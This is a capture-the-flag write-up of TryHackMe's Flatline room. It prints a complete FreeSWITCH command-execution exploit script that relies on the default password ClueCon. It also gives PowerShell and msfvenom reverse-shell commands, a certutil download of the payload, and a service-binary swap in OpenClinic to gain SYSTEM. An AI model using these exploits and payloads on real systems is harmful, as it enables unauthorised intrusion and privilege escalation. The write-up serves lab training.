[TryHackMe] Flatline

[TryHackMe] Flatline

https://tryhackme.com/room/flatline

jamarir's photo
jamarir
·

7 min read

Table of contents

Description: This is a write-up of the Flatline CTF in TryHackMe.

How low are your morals?

Footprinting

Open ports

It seems that the SYN scan (via -sS) cannot be processed by the target, as it shows no open ports:

[SYN scan] technique is often referred to as half-open scanning, because you don't open a full TCP connection.

Here, only a TCP scan showed open ports, using the -sT flag:

kali@kali:~$ nmap -sT -Pn -v10 -p- -oA nmap/tcp_full 10.10.76.179
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack
8021/tcp open  ftp-proxy     syn-ack

Note that -Pn is used to skip Nmap host discovery. Indeed, if the target doesn't respond to ping (which is the default behaviour in Windows), Nmap would skip the scan.

The open ports are:

  • 3389, which runs a Remote Desktop Protocol ;

  • 8021 runs an FTP proxy

An in-depth scan of these ports using the Nmap Script Engine discloses more interesting information:

kali@kali:~$ nmap -Pn -O -sC -sV -p3389,8021 -oA nmap/vuln 10.10.76.179
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-25T20:52:06+00:00
|_ssl-date: 2022-02-25T20:52:08+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

As we have neither username nor password so far, we'll first investigate the FreeSWITCH service running on port 8021

FreeSWITCH

Analysis

I tried to connect to that FTP service, however I saw an HTTP header:

kali@kali:~$ ftp 10.10.76.179 8021
Connected to 10.10.76.179.
Content-Type: auth/request
ftp> ls
Not connected.

Thus, I opened that service in a browser, from which I see in Burp:

>>>
GET / HTTP/1.1
Host: 10.10.76.179:8021

<<<
Content-Type: auth/request


Content-Type: command/reply
Reply-Text: -ERR command not found

When I tried to connect to that port using telnet, and got idled for 10 seconds, the following message appeared:

kali@kali:~$ telnet 10.10.76.179 8021
Trying 10.10.76.179...
Connected to 10.10.76.179.
Escape character is '^]'.
Content-Type: auth/request

Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Connection closed by foreign host.

So far, we gathered two interesting information:

  • The error Reply-Text: -ERR command not found is showed if a wrong password is given ;

  • A link to ClueCon is disclosed.

Googling these information actually reveals this service uses the default password ClueCon. This password can be specified using the auth command:

kali@kali:~$ telnet 10.10.76.179 8021
Trying 10.10.76.179...
Connected to 10.10.76.179.
Escape character is '^]'.
Content-Type: auth/request

auth ClueCon

Content-Type: command/reply
Reply-Text: +OK accepted

However, all the commands that comes after seem not to be processed:

help

Content-Type: command/reply
Reply-Text: -ERR command not found

Command execution

Then, I looked for known vulnerabilities on FreeSWITCH. It might be vulnerable to command execution:

$ searchsploit freeswitch
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                           | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                              | windows/remote/47799.txt
----------------------------------------------------------------------------------- --------------------------------

The exploit in metasploit didn't work:

kali@kali:~$ sudo msfconsole
msf6 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set RHOSTS 10.10.76.179
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set LHOST 10.17.8.104
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > exploit
[*] Started reverse TCP double handler on 10.17.8.104:4444
[*] 10.10.76.179:8021 - Login success
[*] 10.10.76.179:8021 - Sending payload (283 bytes) ...
[*] Exploit completed, but no session was created.

Nevertheless, the Python script in /usr/share/exploitdb/exploits/windows/remote/47799.txt worked !

kali@kali:~$ searchsploit -x 47799.txt
#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

The program open a socket on port 8021 to the target, authenticates to FreeSWITCH using the default password ClueCon. Finally, it uses api system <CMD> to execute commands:

if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))

Once launched, we see the service is prone to OS command injection:

kali@kali:~$ chmod +x ./freeswitch-exploit.py
kali@kali:~$ ./freeswitch-exploit.py 10.10.76.179 "whoami"
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

It's also possible to do it manually via Telnet:

kali@kali:~$ telnet 10.10.204.137 8021
Trying 10.10.204.137...
Connected to 10.10.204.137.
Escape character is '^]'.
Content-Type: auth/request

auth ClueCon

Content-Type: command/reply
Reply-Text: +OK accepted

api system whoami

Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

Local privilege escalation

user.txt

From there, it is possible to launch a PowerShell #2 reverse shell:

kali@kali:~$ nc -nlvp 4444
listening on [any] 4444 ...

kali@kali:~$ ./freeswitch-exploit.py 10.10.182.234 "$(cat revshell.ps1)"

connect to [10.17.8.104] from (UNKNOWN) [10.10.76.179] 49891
whoami
win-eom4pk0578n\nekrotic
PS C:\Program Files\FreeSWITCH>

In Windows boxes, it's generally a good practice to investigate Documents, Downloads and Desktop folders of each users, as well as the C:/ directory.

The user flag was located in the Desktop of user Nekrotic :)

PS C:\users\nekrotic\desktop> Get-Content user.txt
THM{64[...]6}

root.txt

In that same folder, a root flag is present:

$ PS C:\users\nekrotic\desktop> dir


    Directory: C:\users\nekrotic\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       09/11/2021     07:39             38 root.txt
-a----       09/11/2021     07:39             38 user.txt

Obviously, we cannot read it, it would have been to simple :[

PS C:\users\nekrotic\desktop> Get-Content root.txt
PS C:\users\nekrotic\desktop>

However, the C:/ folder contains a project named openclinic:

PS C:\projects\openclinic> dir


    Directory: C:\projects\openclinic


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       09/11/2021     07:29                jdk1.8
d-----       09/11/2021     07:19                mariadb
d-----       09/11/2021     07:30                tomcat8
d-----       09/11/2021     07:29                Uninstall
-a----       06/04/2021     23:14            250 configureCountry.bat
-a----       01/07/2021     18:20            167 configureLanguage.bat
-a----       09/11/2021     07:18         334840 lua5.1.dll
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat
-a----       09/11/2021     07:18        1389568 uninstall.exe

This project might be vulnerable to local privilege escalation:

kali@kali:~$ searchsploit openclinic
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                | windows/local/50448.txt
------------------------------------------------------------------- --------------------------------

The exploit details says

kali@kali:~$ searchploit -x 50448.txt

A low privilege account is able to rename mysqld.exe or tomcat8.exe [...] and replace [them] with a malicious file that would connect back to an attacking computer giving system level privileges (nt authority\system) due to the service running as Local System.

While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file.

Thus, following the PoC of the exploit:

  1. I generated a windows reverse shell and listened for connections:
kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.17.8.104 LPORT=4242 -f exe > mysqld_evil.exe
kali@kali:~$ nc -lnvp 4242
  1. I hosted a local web server into the directory containing the msfvenom payload:
kali@kali:~$ python -m http.server 8080 -d ./
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
  1. I renamed mysqld.exe to a backup file:
PS C:\> cd C:\projects\openclinic\mariadb\bin
PS C:\projects\openclinic\mariadb\bin> Move-Item mysqld.exe mysqld.bak
  1. I downloaded the payload, with the name mysqld.exe, using certutil.exe:
PS C:\projects\openclinic\mariadb\bin> certutil.exe -urlcache -split -f http://10.17.8.104:8080/mysqld_evil.exe mysqld.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

Finally, I restarted the target computer to restart the vulnerable service as NT Autority\System:

PS C:\projects\openclinic\mariadb\bin> Restart-Computer

After some time, the listening reverse shell was running as nt authority\system !

kali@kali:~$ nc -lvp 4242
listening on [any] 4242 ...
10.10.18.229: inverse host lookup failed: Unknown host
connect to [10.17.8.104] from (UNKNOWN) [10.10.18.229] 49670
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

The root flag is:

C:\Users\Nekrotic\Desktop>type root.txt
THM{8c[...]5e}

Did you find this article valuable?

Support jamarir's blog by becoming a sponsor. Any amount is appreciated!

hackingtryhackmeCTFpentesting